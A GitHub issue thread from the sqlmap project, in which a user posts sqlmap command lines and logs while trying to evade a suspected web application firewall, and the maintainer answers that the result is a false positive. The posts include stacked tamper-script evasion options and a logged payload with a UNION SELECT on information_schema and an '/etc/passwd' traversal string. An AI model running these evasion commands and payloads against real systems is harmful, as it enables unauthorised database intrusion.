search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
31.88k stars 5.66k forks source link

any way to inject it again #1179

Closed ashee69 closed 9 years ago

ashee69 commented 9 years ago

hello team, tell me if target is WAF protected first i got false injection this way sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 --tamper=between -v 2 --force-ssl --threads=10 {1.0-dev-ee11292} [17:40:12] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)' [17:40:41] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y [17:47:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [17:47:53] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found

and at last i got this [17:48:59] [INFO] checking if the injection point on GET parameter 'id' is a false positive [17:49:01] [WARNING] false positive or unexploitable injection point detected [17:49:01] [WARNING] GET parameter 'id' is not injectable

then i tried some more ways

sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 --tamper=between -v 3 --force-ssl --dbs --threads=10 --level=5 --risk=3 --technique=T --dbms=mysql [18:29:38] [WARNING] GET parameter 'id' is not injectable [18:29:38] [PAYLOAD] sqlmap/1.0-dev-ee11292 (http://sqlmap.org))').,')'(" [18:29:41] [WARNING] heuristic (basic) test shows that User-Agent parameter 'User-Agent' might not be injectable [18:32:46] [INFO] User-Agent parameter 'User-Agent' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT - comment)' injectable [18:33:11] [WARNING] false positive or unexploitable injection point detected [18:33:11] [WARNING] User-Agent parameter 'User-Agent' is not injectable

why parameter 'user-agent' ????

then i put there all generally used tamper scripts sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 --dbms=mysql --fresh-queries --parse-error --flush-session --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes so result is [18:45:56] [WARNING] false positive or unexploitable injection point detected [18:45:56] [WARNING] GET parameter 'id' is not injectable [18:45:56] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') [18:45:56] [WARNING] HTTP error codes detected during run: 414 (Request-URI Too Long) - 104 times [18:45:56] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)

tried with random-agent sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 --dbms=mysql --fresh-queries --parse-error --random-agent --flush-session --tamper=between not injectable at all [20:31:21] [WARNING] GET parameter 'id' is not injectable

can you tell me some more ways to test or if it is not injectable. thank you.

giveen commented 9 years ago

Have you tried running --identify-waf?

ashee69 commented 9 years ago

new tool itself asking me in the begining whether to indetify WAF so i dont think this command can do anything different. gonna run it again with it

giveen commented 9 years ago

I've noticed that at the beginngin of the run if it asks, it will almost never "find it", but if you tell to identify-waf, it will run the scripts and find out what one it is.

ashee69 commented 9 years ago

NO WAF

[00:05:31] [DEBUG] declared web page charset 'utf-8' [00:05:31] [DEBUG] heuristically checking if the target is protected by some kind of WAF/IPS/IDS [00:05:31] [PAYLOAD] VPyO=5304 AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2 NOT BETWEEN 0 AND 1-- ../../../etc/passwd [00:05:36] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection [00:05:36] [DEBUG] checking for WAF/IDS/IPS product 'FortiWeb Web Application Firewall (Fortinet Inc.)' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'SEnginx (Neusoft Corporation)' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Deny All Web Application Firewall (DenyAll)' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Varnish FireWall (OWASP) ' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'BIG-IP Application Security Manager (F5 Networks)' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Anquanbao Web Application Firewall (Anquanbao)' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Sucuri WebSite Firewall' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Yunjiasu Web Application Firewall (Baidu)' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Palo Alto Firewall (Palo Alto Networks)' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'SecureIIS Web Server Security (BeyondTrust)' [00:05:47] [DEBUG] declared web page charset 'iso-8859-1' [00:05:47] [DEBUG] got HTTP error code: 501 (Method Not Implemented) [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'BlockDoS' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'EdgeCast WAF (Verizon)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product '360 Web Application Firewall (360)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'ExpressionEngine (EllisLab)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Safedog Web Application Firewall (Safedog)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Profense Web Application Firewall (Armorlogic)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)' [00:05:49] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)' [00:05:49] [DEBUG] checking for WAF/IDS/IPS product 'ISA Server (Microsoft)' [00:05:49] [DEBUG] got HTTP error code: 400 (Bad Request) [00:05:49] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)' [00:05:49] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)' [00:05:50] [DEBUG] page not found (404) [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'Airlock (Phion/Ergon)' [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'UrlScan (Microsoft)' [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'ASP.NET RequestValidationMode (Microsoft)' [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)' [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'IBM WebSphere DataPower (IBM)' [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)' [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)' [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)' [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'dotDefender (Applicure Technologies)' [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)' [00:05:50] [WARNING] no WAF/IDS/IPS product has been identified

ashee69 commented 9 years ago

so i continued the test and got this result my request: sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 --tamper=between -v 3 -u --dbs --threads=10 --level=2 --risk=2 --skip-urlencode --identify-waf

and result [01:05:23] [WARNING] HTTP error codes detected during run: 400 (Bad Request) - 1 times, 404 (Not Found) - 1 times, 501 (Not Implemented) - 1 times [01:05:23] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)

stamparm commented 9 years ago

How you concluded "NO WAF" from "[00:05:50] [WARNING] no WAF/IDS/IPS product has been identified" ????

Is identification the same as existences???

You have a false positive and now you want to force the target to be injectable. Please don't open any new issues like this one.

hussein391 commented 7 years ago

try use --batch --level=3 --risk=3 --random-agent